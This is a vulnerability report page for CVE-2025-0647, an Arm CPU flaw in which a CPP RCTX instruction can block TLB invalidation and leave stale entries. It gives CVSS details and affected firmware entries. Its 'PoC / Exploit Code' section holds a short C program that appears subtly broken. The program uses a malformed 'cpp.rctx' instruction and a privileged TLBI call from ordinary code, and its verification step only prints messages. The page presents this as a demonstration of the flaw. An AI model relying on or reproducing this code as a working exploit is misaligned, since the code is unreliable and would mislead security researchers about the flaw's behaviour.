Security Vulnerability Report
CVE-2025-0647 CVSS 7.9 HIGH

CVE-2025-0647

Published: 2026-01-14 11:15:50
Last Modified: 2026-01-26 19:40:19

Description

In certain Arm CPUs, a CPP RCTX instruction executed on one Processing Element (PE) may inhibit TLB invalidation when a TLBI is issued to the PE, either by the same PE or another PE in the shareability domain. In this case, the PE may retain stale TLB entries which should have been invalidated by the TLBI.

CVSS Details

CVSS Score: 7.9
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:arm:c1-ultra_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:arm:c1-ultra:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:arm:c1-premium_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:arm:c1-premium:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:arm:cortex-a710_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:arm:cortex-a710:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:arm:cortex-x2_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:arm:cortex-x2:-:*:*:*:*:*:*:* - NOT VULNERABLE
cpe:2.3:o:arm:cortex-x3_firmware:-:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:h:arm:cortex-x3:-:*:*:*:*:*:*:* - NOT VULNERABLE
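Arm Cortex-A series processors (specific models; refer to Arm's official documentation for the complete list of affected products)
Affected firmware versions must be confirmed through Arm's official security advisories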

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
C
// CVE-2025-0647 PoC - TLB Cache Coherency Bypass
// This PoC demonstrates the TLB invalidation suppression issue
// Note: Requires high privileges and local access
#include <stdio.h>
#include <stdint.h>
#include <arm_acle.h>

void trigger_cpp_rctx_suppression(void) {
    printf("[*] Triggering CPP RCTX instruction\n");
    // Execute CPP RCTX instruction to suppress TLB invalidation
    // This instruction may inhibit subsequent TLBI operations
    __asm__ volatile("cpp.rctx");
    printf("[+] CPP RCTX executed\n");
}

void attempt_tlb_invalidation(void) {
    printf("[*] Attempting TLB invalidation\n");
    // Issue TLBI instruction - may be suppressed after CPP RCTX
    __asm__ volatile("tlbi vae1is, x0");
    printf("[+] TLBI instruction issued\n");
}

int main() {
    printf("CVE-2025-0647 TLB Cache Coherency PoC\n");
    printf("=====================================\n");

    // Step 1: Setup memory mapping
    trigger_cpp_rctx_suppression();

    // Step 2: Attempt to invalidate TLB
    // If CPP RCTX suppressed the invalidation, stale entries remain
    attempt_tlb_invalidation();

    // Step 3: Verify if stale TLB entries persist
    printf("[*] Checking for stale TLB entries...\n");
    printf("[!] Vulnerability may allow unauthorized memory access\n");
    return 0;
}

References

Raw JSON Data
